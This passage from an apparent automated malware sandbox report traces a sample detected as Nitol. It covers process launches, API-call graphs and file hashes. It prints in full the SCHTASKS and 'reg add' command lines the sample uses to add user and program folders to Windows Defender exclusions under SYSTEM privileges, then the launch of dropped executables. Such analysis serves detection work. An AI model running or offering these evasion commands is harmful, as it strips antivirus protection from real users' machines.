                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:18
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:19
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:20
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:21
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:22
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:23
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:24
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:25
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:26
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:27
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:28
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:29
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:30
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:31
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:32
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:33
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:34
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:35
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:36
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:37
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:38
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:39
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:40
                                                                                      Start time:19:54:45
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3515800506.0000000003800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000028.00000002.3517048047.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:false

                                                                                      Target ID:41
                                                                                      Start time:19:54:47
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:42
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:true

                                                                                      Target ID:43
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:44
                                                                                      Start time:19:54:48
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:45
                                                                                      Start time:19:54:50
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:46
                                                                                      Start time:19:54:50
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:47
                                                                                      Start time:19:55:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\8srsV\pw8XjN.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\8srsV\pw8XjN.exe"
                                                                                      Imagebase:0x6c0000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:48
                                                                                      Start time:19:55:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\2dHqG0\2dHqG0.exe"
                                                                                      Imagebase:0xb20000
                                                                                      File size:54'152 bytes
                                                                                      MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:2.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:32%
                                                                                        Total number of Nodes:462
                                                                                        Total number of Limit Nodes:7
140004f30 sprintf_s NtAllocateVirtualMemory 14240 140001262 14239->14240 14240->13993 14243 140004f39 __CxxFrameHandler 14241->14243 14242 140004f44 14242->14234 14243->14242 14246 140006c95 14243->14246 14245 14000660e sprintf_s 14245->14234 14247 140006d9d 14246->14247 14248 140006d7b 14246->14248 14247->14245 14248->14247 14249 140006f95 NtAllocateVirtualMemory 14248->14249 14249->14247 14253 140008270 14250->14253 14252 140001238 MessageBoxW 14252->14239 14254 1400082ac _lock 14253->14254 14255 14000827e 14253->14255 14254->14252 14255->14254 14257 140008120 14255->14257 14258 14000816a 14257->14258 14262 14000813b _lock 14257->14262 14260 1400081d7 14258->14260 14258->14262 14263 140007f50 14258->14263 14261 140007f50 sprintf_s 54 API calls 14260->14261 14260->14262 14261->14262 14262->14254 14264 140007f69 sprintf_s 14263->14264 14265 140007f74 _lock 14264->14265 14266 14000801d 14264->14266 14276 14000cd50 14264->14276 14265->14260 14267 1400080d5 14266->14267 14268 14000802f 14266->14268 14269 14000cc00 sprintf_s 54 API calls 14267->14269 14270 14000804c 14268->14270 14272 140008081 14268->14272 14274 140008056 14269->14274 14279 14000cc00 14270->14279 14272->14274 14287 14000c2a0 14272->14287 14274->14260 14277 140008300 _lock 17 API calls 14276->14277 14278 14000cd6a 14277->14278 14278->14266 14280 14000cc3f 14279->14280 14286 14000cc23 _lock sprintf_s 14279->14286 14280->14286 14295 14000fc50 14280->14295 14284 14000ccc5 _lock sprintf_s 14340 14000fd20 LeaveCriticalSection 14284->14340 14286->14274 14288 14000c2e0 14287->14288 14291 14000c2c3 _lock sprintf_s 14287->14291 14289 14000fc50 sprintf_s 25 API calls 14288->14289 14288->14291 14290 14000c34e 14289->14290 14292 14000c1f0 sprintf_s 2 API calls 14290->14292 14293 14000c367 _lock sprintf_s 14290->14293 14291->14274 14292->14293 14374 14000fd20 LeaveCriticalSection 14293->14374 14296 14000fc96 14295->14296 14297 14000fccb 14295->14297 14341 14000b400 14296->14341 14299 14000ccac 14297->14299 14300 
14000fccf EnterCriticalSection 14297->14300 14299->14284 14305 14000c3f0 14299->14305 14300->14299 14308 14000c42e 14305->14308 14324 14000c427 _lock sprintf_s 14305->14324 14306 140004f30 sprintf_s NtAllocateVirtualMemory 14307 14000cbe6 14306->14307 14307->14284 14311 14000c4fb __CxxFrameHandler sprintf_s 14308->14311 14308->14324 14368 14000c1f0 14308->14368 14310 14000c841 14312 14000c86a 14310->14312 14313 14000cb20 WriteFile 14310->14313 14311->14310 14316 14000c526 GetConsoleMode 14311->14316 14315 14000c936 14312->14315 14320 14000c876 14312->14320 14314 14000cb53 GetLastError 14313->14314 14313->14324 14314->14324 14321 14000c940 14315->14321 14330 14000ca02 14315->14330 14316->14310 14317 14000c557 14316->14317 14317->14310 14318 14000c564 GetConsoleCP 14317->14318 14318->14324 14335 14000c581 sprintf_s 14318->14335 14319 14000c8c5 WriteFile 14319->14320 14322 14000c928 GetLastError 14319->14322 14320->14319 14320->14324 14321->14324 14325 14000c991 WriteFile 14321->14325 14322->14324 14323 14000ca57 WideCharToMultiByte 14326 14000cb15 GetLastError 14323->14326 14323->14330 14324->14306 14325->14321 14327 14000c9f4 GetLastError 14325->14327 14326->14324 14327->14324 14328 14000cab0 WriteFile 14329 14000caf6 GetLastError 14328->14329 14328->14330 14329->14324 14329->14330 14330->14323 14330->14324 14330->14328 14331 14000c649 WideCharToMultiByte 14331->14324 14332 14000c68c WriteFile 14331->14332 14333 14000c80d GetLastError 14332->14333 14332->14335 14333->14324 14334 14000c829 GetLastError 14334->14324 14335->14324 14335->14331 14335->14334 14336 14000c6e2 WriteFile 14335->14336 14337 14000fd50 7 API calls sprintf_s 14335->14337 14339 14000c81b GetLastError 14335->14339 14336->14335 14338 14000c7ff GetLastError 14336->14338 14337->14335 14338->14324 14339->14324 14342 14000b41e 14341->14342 14343 14000b42f EnterCriticalSection 14341->14343 14347 14000b2f0 14342->14347 14345 14000b423 14345->14343 14346 1400084e0 _lock 12 API calls 14345->14346 
14346->14343 14348 14000b317 14347->14348 14349 14000b32e 14347->14349 14350 140009540 _lock 12 API calls 14348->14350 14351 14000b342 _lock 14349->14351 14353 140008300 _lock 17 API calls 14349->14353 14352 14000b31c 14350->14352 14351->14345 14354 140009300 _lock 10 API calls 14352->14354 14355 14000b350 14353->14355 14356 14000b324 14354->14356 14355->14351 14357 14000b400 _lock 22 API calls 14355->14357 14358 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14356->14358 14359 14000b371 14357->14359 14358->14349 14360 14000b3a7 14359->14360 14361 14000b379 14359->14361 14363 140008de0 _lock HeapFree GetLastError 14360->14363 14362 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14361->14362 14364 14000b386 14362->14364 14367 14000b392 _lock 14363->14367 14366 140008de0 _lock HeapFree GetLastError 14364->14366 14364->14367 14365 14000b3b0 LeaveCriticalSection 14365->14351 14366->14367 14367->14365 14369 14000c20c sprintf_s 14368->14369 14370 14000c212 _lock 14369->14370 14371 14000c22c SetFilePointer 14369->14371 14370->14311 14372 14000c24a GetLastError 14371->14372 14373 14000c254 sprintf_s 14371->14373 14372->14373 14373->14311 13940 140006c95 13941 140006d9d 13940->13941 13942 140006d7b 13940->13942 13942->13941 13943 140006f95 NtAllocateVirtualMemory 13942->13943 13943->13941 14375 1400054e0 14376 14000552c 14375->14376 14379 140005506 _lock 14375->14379 14388 1400074d0 14376->14388 14380 140008370 3 API calls 14384 140005545 __CxxFrameHandler 14380->14384 14381 1400055b8 14382 140008de0 _lock 2 API calls 14381->14382 14383 1400055c0 sprintf_s 14382->14383 14383->14379 14384->14381 14392 1400074f0 14384->14392 14387 1400055b0 GetLastError 14387->14381 14390 140007333 14388->14390 14389 140005536 14389->14380 14390->14389 14391 1400073e0 LdrLoadDll 14390->14391 14391->14390 14393 140007333 14392->14393 14394 140005561 CreateThread 14393->14394 14395 1400073e0 LdrLoadDll 14393->14395 14394->14383 14394->14387 14395->14393

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@
                                                                                        • API String ID: 0-149943524
                                                                                        • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                        • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                        • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                        • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                        • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                        • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                        • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateReadmalloc
                                                                                        • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                        • API String ID: 3950102678-3381721293
                                                                                        • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
